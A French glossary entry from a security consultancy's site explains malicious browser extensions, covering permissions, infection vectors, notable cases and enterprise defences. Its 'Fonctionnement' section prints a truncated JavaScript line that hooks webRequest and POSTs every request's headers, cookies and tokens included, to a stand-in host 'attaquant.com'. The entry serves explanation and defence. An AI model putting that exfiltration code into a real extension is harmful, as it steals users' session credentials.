Browser Extension Malware
hackingDéfinition
Les extensions de navigateur malveillantes (Browser Extension Malware) exploitent les permissions étendues accordées aux extensions de navigateur pour espionner les utilisateurs, voler des credentials, injecter des publicités, modifier des pages web, et effectuer du cryptomining. Avec plus de 3 milliards d'utilisateurs Chrome et Firefox, la compromission via des extensions malveillantes touche des millions de victimes. Les extensions de navigateur ont accès à des permissions puissantes selon ce que l'utilisateur accepte lors de l'installation : lecture de tout le trafic web (tabs, cookies, requêtes réseau), modification du DOM des pages, accès au presse-papiers, exécution de scripts dans les pages visitées, et communication avec des serveurs distants. Une extension avec 'Accéder à vos données sur tous les sites web' peut intercepter les credentials tapés sur n'importe quel site. Des vecteurs d'infection incluent : des extensions légitimes compromises (rachat d'une extension populaire par un acteur malveillant, puis mise à jour avec du code malveillant), des extensions se faisant passer pour des extensions populaires (bloqueurs de pub, outils de capture d'écran), des extensions proposées via des publicités ou des sites de phishing, et des extensions légitimes avec un écosystème de plugins malveillants. Des cas notables incluent : Great Suspender (extension Chrome populaire achetée et transformée en malware en 2020), une série d'extensions 'bloqueur de pub' malveillantes qui volaient les cookies de session Google et Facebook, et des extensions spécifiquement ciblant les portefeuilles crypto (MetaMask clones, portefeuilles hardware fake). Les entreprises protègent leurs environnements en imposant des politiques d'extensions via les MDM (Mobile Device Management), en limitant les extensions aux seules approuvées par le service IT, et en surveillant les installations d'extensions via les outils EDR.
Fonctionnement
Une extension malveillante avec permission 'webRequest' intercepte toutes les requêtes HTTP : chrome.webRequest.onBeforeSendHeaders.addListener(function(details){fetch('https://attaquant.com/log',{method:'POST',body:JSON.stringify(details.requestHeaders)});}, {urls:['. Tous les headers HTTP (incluant cookies de session, tokens d'authentification) sont exfiltrés vers l'attaquant pour chaque requête vers chaque site web visité.
Exploitation offensive
Les extensions malveillantes pour crypto wallets (faux MetaMask, Ledger Live) volent les seed phrases entrées par les victimes, compromettant immédiatement tous les actifs crypto. Des extensions de capture d'écran ou de 'productivité' avec des permissions larges peuvent fonctionner comme des keyloggers et des screen recorders discrets, particulièrement dangereuses dans des contextes professionnels.
Détection et mitigation
Les entreprises devraient déployer des politiques Group Policy ou MDM qui restreignent les extensions aux seules approuvées (whitelist basée sur l'ID d'extension Chrome). Les EDR modernes (CrowdStrike, SentinelOne) surveillent les processus d'extension de navigateur et leurs communications réseau. Les utilisateurs devraient vérifier les permissions demandées avant d'installer une extension et éviter les extensions en dehors des stores officiels.
Articles liés
Expert en cybersécurité offensive et intelligence artificielle. Pentest, audit et développement IA sur-mesure.
Services
- Audit Infrastructure
- Audit Kubernetes
- Audit Microsoft 365
- Audit Sécurité Réseau
- Analyse de Risques
- Audit Active Directory
- Audit Application Web
- Audit Cloud (AWS/Azure/GCP)
- Audit Messagerie
- Audit API (OWASP Top 10)
- Audit DevSecOps & CI/CD
- Audit Code Source (SAST)
- Audit Postes de Travail
- Audit Sauvegarde & Résilience
- Audit OT/SCADA (IEC 62443)
- Développement IA
- Formations
Ressources
Projets & Outils
© 2026 Ayi NEDJIMI Consultants. Tous droits réservés.
Un projet cybersécurité ?
Expert dispo · Réponse 24h